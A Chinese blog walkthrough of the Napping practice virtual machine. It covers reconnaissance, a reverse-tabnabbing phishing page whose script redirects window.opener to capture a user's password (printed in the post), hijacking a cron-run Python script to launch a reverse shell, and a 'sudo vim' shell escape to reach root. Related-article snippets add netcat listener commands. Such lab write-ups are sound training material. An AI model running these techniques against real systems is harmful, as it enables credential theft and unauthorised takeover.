Napping靶机

最新推荐文章于 2025-08-26 22:01:08 发布
最新推荐文章于 2025-08-26 22:01:08 发布
阅读量392 收藏 6
点赞数 4
CC 4.0 BY-SA版权
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_77710417/article/details/149753907

一、信息收集

扫描不出ip,改一下网卡配置。

重启一下,在启动时按住shift,出现了下面这个界面后按e,然后找到ro,后面写rw single init=/bin/bash。

修改完后按Ctrl + X ,输入ip a查看网卡ens33,然后cd到etc/netplan,ls发现里面有yaml文件,vim修改(注意:要一级一级去cd)

改成ens33,然后重启一下虚拟机,再去找我们的ip。

开放端口有80,22,我们去访问一下。22端口无法访问,80端口就是主页,他让我们去登录账号,但是我们没有,去注册一个试试。

登录进去之后可以发现一个提交框,我们提交什么网站路径,它就会跳转到这个网站。

二、渗透

我们创建两个页面,一个是正常页面,一个是恶意页面。内容如下:

<html>
        <body>
                <script>
                        if(window.opener) window.opener.parent.location.replace('http://192.168.13.135:8000/1.html');
                        </script>
                        </body>
                        </html>

<html>
        <title>napping</title>
        <body>
                hello
                </body>
                </html>

然后在页面提交http://192.168.13.135/1.html,提交完之后点here,就跳转到我们的1.html页面了。

拿到了账号:daniel,密码:C%40ughtm3napping123,解码:C@ughtm3napping123。使用ssh进行连接。

三、提权

我们首先看看用户属于的组,属于administrators组,使用find命令查找一下这个组可以运行的程序。

 find / -group administrators 2>/dev/null

查看一下这个py文件。

cat /home/adrian/query.py

从文件里我们可以知道,它往site_status.txt文件内写东西,查看一下这个文件。发现貌似两分钟执行一次。

cat /home/adrian/site_status.txt

我们尝试反弹一个shell,我们首先创建一个sh文件。内容是反弹shell。

修改一下python文件,让他自己执行这个文件,从而获取用户权限。

在kali里监听8000端口,等一会就监听到了。然后查看一下权限,可以运行vim,直接使用vim命令提权。

sudo vim -c ':!/bin/bash'

​​​​​​​

Vulnhub项目:NAPPING: 1.0.1
Ays.Ie的博客
05-07 889
Vulnhub项目:NAPPING: 1.0.1
Vulnhub napping-1.0.1靶机攻击实战(一)
初学者
02-08 923
到这里,就算获得了root的权限了,那么这里有人会问,为什么我们拿到了daniel用户的权限,不直接通过这个用户提权反而是要通过adrian用户建立反射shell进行提权呢?这个问题有兴趣的读者可以深入研究一下。
napping靶机教程(超详细讲解)
weixin_74124665的博客
07-29 1302
下载完成后,直接用VM打开,这样的话点一下重试就好了。然后右击虚拟机设置网络连接改成nat模式。
napping靶机攻略
2301_77171859的博客
07-29 151
监听到后我们得到了一个账号密码,由于之间扫出来一个22端口,所以们用ssh连接一下。然后我们可以写一个钓鱼漏洞,在kali写一个1.html,并开启nc监听。发现py程序每两分钟执行一次,之后们在家目录下创建一个shell文件。发现它向site_status.txt文件写入东西,查看一下文件。连接成功后我们查看一下用户所在组,以及该组可执行的程序。发现开启了80端口和22端口,我们访问一下ip。之后我们开启nc监听,等待py脚本运行。找到一个py文件我们来查看一下。然后修改一下py文件。
Napping靶机通关教程
m0_75169999的博客
07-30 220
3.然乎将制作好的两个文件放在kali里面然后,监听端口:nc -lvvp 6688,然后提交http://192.168.192.128/1.html地址进行提交,监听到用户和密码了就可以获得账户和密码了。1.打开kali 使用命令:arp-scan -l扫描同一网段下的机器(kali是nat模式)成功扫描到机器。2.使用nmap扫描存在的端口和服务,看到存在80 和22端口。4.扫描一下存在的目录,可以看到存在以下目录。2.然后我们尝试登录,登录成功后可以看到。1.我们尝试去注册一个用户。
Napping靶机渗透测试攻略
2301_77839771的博客
07-29 862
发现此处有个超级链接,点击后跳转到baidu.com。发现了我们输入的URL被嵌入了该页面并且作为跳转地址,而且target=_blank,表明是在新的地址跳转而且没有审核。在/var/www/html目录下放两个html文件,一个为站点首页(index.html),一个为钓鱼界面(test.html)在kali上wget下载的网站首页文件为.php,需要重命名为.html。写好我们的钓鱼界面后我们开启监听,访问kali下的网页,需要开启http服务并在kali监听端口,监听的端口为钓鱼页面里链接的端口。
Napping靶机渗透测试记录
Jach1n
01-31 353
Napping靶机渗透测试记录
渗透测试学习之靶机napping-1.0.1
xdbzdgx的博客
04-30 1346
前期准备 1.下载靶机Napping-1.0.1WebGOAT: 1 ~ VulnHub 1.载入vmware,网络模式设置为NAT kali IP地址为192.168.88.128 靶机 IP地址为192.168.88.129 一 、信息收集 1.使用nnamp扫描器扫描开放的端口 nmap -T4 -sV -p- 192.168.88.129 发现开放了80端口和22远程控制端口 2.寻找web信息 访问后发现需要登录,随即注册账号并登录。 此处..
Vulnhub靶场:NAPPING: 1.0.1
weixin_69670995的博客
06-05 1526
发现a连接出现了刚刚输入的url,猜测这是一个社工,可以写一个钓鱼页面,新建一个b.html文件,将下面的代码写入。将靶机导入到Oracle VM VirtualBox中,网络设置仅主机模式,和kali使用相同的网卡。发现该py程序每两分钟执行一次,这里在用户的家目录下新建一个shell.sh文件。然后新建一个a.html文件,下面代码写入(写一个正常的页面就行)发现一个a连接,输入一个url再次查看网页源代码。发现22端口和80端口,使用浏览器访问80端口。发现是一个登陆页面,首先进行注册。
napping-1.0.1靶机
2301_78563207的博客
07-29 185
发现site_status.txt文件每两分钟写入一次,就表明query.py每两分钟执行一次,因此我们就可以写入反弹shell的脚本来让query.py脚本进行执行,获取更高的权限的shell。登录账号之后发现有一个输入网址的地方,那我们就先随便输入一个网址,看看是什么功能,发现他给我们多了一行,点击后就会跳转到我们刚刚输入的网站,说明这是一个跳转网页的功能模块。由此可知靶机的ip为172.16.2.72,并且他还开放了80和22端口,那我们就可以先访问他的80端口,发现是一个登录的页面。
Vulnhub-NAPPING: 1.0.1靶机
qq_74265615的博客
07-29 490
在官网中下载好对应的靶机安装到VirtualBox中,这里使用的网络模式为桥接。
NAPPING
10-24
标题"NAPPING"可能指的是一个与字体设计或者艺术相关的项目,因为"字体"是给定的标签之一。在IT行业中,字体通常涉及到用户界面(UI)设计、网页设计、图形设计等领域,是信息传达的重要组成部分。字体的选择和设计...
Vulnhub靶机网卡启动失败(Raise network interfaces)
qq_35664104的博客
02-26 742
使用一些Linux靶机进行搭建后可能会出现无法搜索到IP的情况,并且会在系统启动时报错,类似下图所示这个主要是因为vulnhub上的镜像由于搭建环境、版本等问题不适配,网卡没有正确识别导致的,我们进行如下修改。
平安产险青海分公司助力国家电投黄河公司安全生产
2501_91664667的博客
08-25 139
此次捐赠活动中,蒋应龙总特别强调:"安全生产是企业发展的生命线,我们通过精准匹配安全物资需求与风险服务,持续为企业筑牢安全防线。为积极响应第24个全国"安全生产月",平安产险青海分公司西宁中支经理蒋应龙、重客业务部总监沈斌一行联合国家电投保险经纪青海分公司,向黄河上游水电开发有限责任公司捐赠应急手电筒、车载充气泵等专业安全物资,以"物资支持+风险服务"双模式助力企业安全生产。此次活动不仅是平安产险青海分公司积极履行社会责任的体现,也为双方在安全生产领域的深入合作奠定了良好的基础。
相机激光安全等级和人眼安全
最新发布
折翼孤雁
08-26 423
激光直射眼睛会对眼睛造成严重损害,通常表现为灼伤和对视网膜的直接损害。波长范围在400~1400 nm的激光会直接穿过眼睛的晶状体、角膜和房水到达视网膜。当激光能量被视网膜吸收时,可能导致视网膜烧伤,甚至可能导致永久性的视力损伤。当视网膜有足够大的部分受损或激光直接照射视神经时,视力会明显下降甚至丧失。激光安全标准是旨在减少激光曝光风险的综合性指导原则。这些标准由国际和国家监管机构制定和更新,包括国际电工委员会(IEC)和美国国家标准学会(ANSI)。
2025年游戏盾SDK动态加密技术全景解析:从防御破解到重塑游戏安全基石
2403_86962125的博客
08-22 688
2025年的游戏安全战争,本质是“加密强度”与“破解成本”的博弈。游戏盾SDK通过动态密钥协商×协议混淆×多层加密×AI自适应的四维体系,将破解成本提升至黑产无法承受的高度。当攻击者的ROI(投资回报率)趋于零时,你的游戏才真正安全。立即行动现有项目评估:使用抓包工具测试当前游戏协议是否明文传输逐步升级:从关键接口(登录/支付)开始部署动态加密长期规划:制定向后量子密码迁移的路线图。
电子厂静电释放检测误报率↓81%!陌讯多模态融合算法在安全生产监控的落地实践
xiaobaibai153的博客
08-24 614
【原创声明】本文为作者原创技术解析,引用数据与技术方案均来自 “陌讯技术白皮书(静电释放检测专项版)”,未经许可禁止转载。
【Java】 Spring Security 赋能 OAuth 2.0:构建安全高效的现代认证体系
一个被知识诅咒的人
08-25 468
在当今数字化时代,认证与授权已成为应用系统安全的核心。OAuth 2.0 作为一种开放标准协议,广泛应用于第三方授权场景中,而 Spring Security 则提供了强大的框架支持来实现这一协议。本文深入探讨了如何利用 Spring Security 构建一个完整的 OAuth 2.0 认证系统,从 OAuth 2.0 的基本原理入手,详细阐述了授权服务器、资源服务器和客户端的配置与实现。文章结合实际代码示例,包括依赖引入、配置类编写、令牌生成与验证等关键步骤,并通过中文注释进行详细解释。同时,介绍了常见
进程内加密与安全字符串:Data Protection + Key Rotation
Kookoos的博客
08-26 614
本文详细介绍了在 .NET/ABP 项目中实现 进程内加密与安全字符串的最佳实践,重点讲解了 Data Protection API 在密钥持久化、轮换、吊销与审计中的应用。包括 自动/手动密钥轮换、双人审批机制、应急吊销及 静态加密(DPAPI、X.509、Azure Key Vault)等内容。文章通过实际代码示例展示了如何配置 Redis、文件系统、Azure Blob 存储与密钥加密方案,确保加密数据的安全性与系统的高可用性。
如何删除导入napping
05-26
如果您想删除已导入的Python模块`napping`,可以使用以下命令: ``` pip uninstall napping ``` 这将从Python环境中删除`napping`模块及其依赖项。请注意,您需要在命令行中执行此命令,并确保您具有足够的权限来卸载模块。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值